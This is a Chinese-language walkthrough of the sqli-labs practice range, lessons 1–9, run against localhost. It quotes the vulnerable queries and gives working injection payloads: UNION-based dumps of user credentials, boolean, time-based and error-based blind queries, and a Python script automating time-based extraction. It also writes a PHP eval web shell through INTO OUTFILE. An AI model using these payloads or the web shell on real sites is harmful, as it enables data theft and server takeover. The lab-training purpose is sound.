sqli-labs靶场(1)GET型

1

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

1

http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,3 --+

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

爆数据库
id=-1'union select 1,group_concat(schema_name),3 from information_schema.schemata--+

爆表名
id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

爆字段名
id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

爆数据名
id=-1'union select 1,group_concat(username,password),3 from security.users--+
id=-1'union select 1,group_concat(username,password),3 from users--+

1

 $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

1

http://127.0.0.1/sqli-labs/Less-3/?id=-1 union select 1,2,3 --+

1

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

1

http://127.0.0.1/sqli-labs/Less-3/?id=-1') union select 1,2,3 --+

1
2

$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

1

http://127.0.0.1/sqli-labs/Less-4/?id=-1") union select 1,2,3 --+

1
2
3

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
...
	print_r(mysql_error());

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

//判断数据库的长度
?id=1'and length((select database()))>9--+

//截取判断对应字符
//substr(a,b,c)a是要截取的字符串，b是截取的位置，c是截取的长度。
?id=1'and ascii(substr((select database()),1,1))=115--+

//判断所有表名字符长度
?id=1'and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13--+

//逐一判断表名
?id=1'and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99--+

//判断所有字段名的长度
?id=1'and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20--+

//逐一判断字段名
?id=1'and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99--+

//判断字段内容长度
?id=1' and length((select group_concat(username,password) from users))>109--+

//逐一检测内容
?id=1' and ascii(substr((select group_concat(username,password) from users),1,1))>50--+

1
2

id=1' and If(ascii(substr(database(),1,1))=115,1,sleep(5))-- #
当正确时无明显延迟,错误有明显延迟

1

id=1' UNION SELECT (IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null)),2,3 FROM (select database() as current) as tb1-- #

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

# coding:utf-8
import requests
import datetime
import time

# 获取数据库名长度


def database_len():
    for i in range(1, 10):
        url = "http://127.0.0.1/sqli-labs/Less-5/index.php"
        payload = " ?id=1' and if(length(database())>%s,sleep(1),0) --+" % i
        # print(url+payload+'%23')
        time1 = datetime.datetime.now()
        r = requests.get(url + payload)
        time2 = datetime.datetime.now()
        sec = (time2 - time1).seconds
        if sec >= 1:
            print(i)
        else:
            print(i)
            break
    print('database_len:', i)

#获取数据库名
def database_name():
    name = ''
    for j in range(1,9):
        for i in '0123456789abcdefghijklmnopqrstuvwxyz':
            url = "http://127.0.0.1/sqli-labs/Less-5/index.php"
            payload = "?id=1' and if(substr(database(),%d,1)='%s',sleep(3),1) --+" % (j,i)
            #print(url+payload)
            time1 = datetime.datetime.now()
            r = requests.get(url + payload)
            time2 = datetime.datetime.now()
            sec = (time2 - time1).seconds
            if sec >=3:
                name += i
                print(name)
                break
    print('database_name:', name)


if __name__ == '__main__':
    database_name()

1
2

mysql> updatexml(1,concat(0x5e,database(),0x5e),1);
ERROR 1105 (HY000): XPATH syntax error: '^security^'

1

?id=1' and updatexml(1,concat(0x5e,(substr((select group_concat(username,0x7e,password) from users),1)),0x5e),1) --+

1
2
3
4
5
6
7

$id=$_GET['id'];
...
$id = '"'.$id.'"';
...
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
...
	print_r(mysql_error());

1

?id=1"and length((select database()))>9--+

1
2
3

$id=$_GET['id'];
...
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";

1

?id=1')) and length((select database()))>9--+

1
2
3

//@@datadir输出数据库中数据的存放路径
?id=-1' union select 1,2,@@datadir--+
//得到Your Password:D:\phpstudy_pro\Extensions\MySQL5.7.26\data\

1
2
3
4

//需要修改my.ini
secure_file_priv的值为null时,表示限制mysql不允许导入,导出
secure_file_priv的值为/tmp/,表示限制mysql的导入,导出只能发生在/tmp/目录下
secure_file_priv的值没有具体的值""时表示不对mysql的导入导出做出限制

1

?id=-1')) union select * from security.users into outfile "D:\\phpstudy_pro\\WWW\\other\\sqli-labs\\Less-7\\users.txt" --+

1

?id=-1')) union select 1,2,"<?php @eval($_POST['aaa']);?>" into outfile "D:\\phpstudy_pro\\WWW\\other\\sqli-labs\\Less-7\\shell.php" --+

1
2
3

$id=$_GET['id'];

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

1

?id=1' and if(ascii(substr(database(),1,1))>1,sleep(5),sleep(1)) --+

1

?id=1' and if(ascii(substr(database(),1,1))>1,sleep(5),sleep(1)) --+

1
2
3

$id=$_GET['id'];
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

1

?id=1" and if(ascii(substr(database(),1,1))>1,sleep(5),sleep(1)) --+

1
2
3
4
5

mid(column_name,start,length)
column_nmae:需要提取的字符字段
start:规定开始的位置
length:要返回的字段数
mid(database(),1,1)>'a':查看数据库名的第一位

1
2
3
4

substr()和substring()函数实现的功能是一样的
string substring(string,start,length)
string substr(string,start,length)
参数描述同mid参数,第一个为要处理的字符串,start为开始位置,length为截取的长度

1
2
3

left()得到字符串左部指定个数的字符串
left(string,n)
string为要截取的字符串,n为长度

1
2
3

返回第一个字符的ascii码
判断database()的第一位ascii码是否大于114：
ord(mid(database(),1,1))>114

1

将某个字符转换为 ascii 值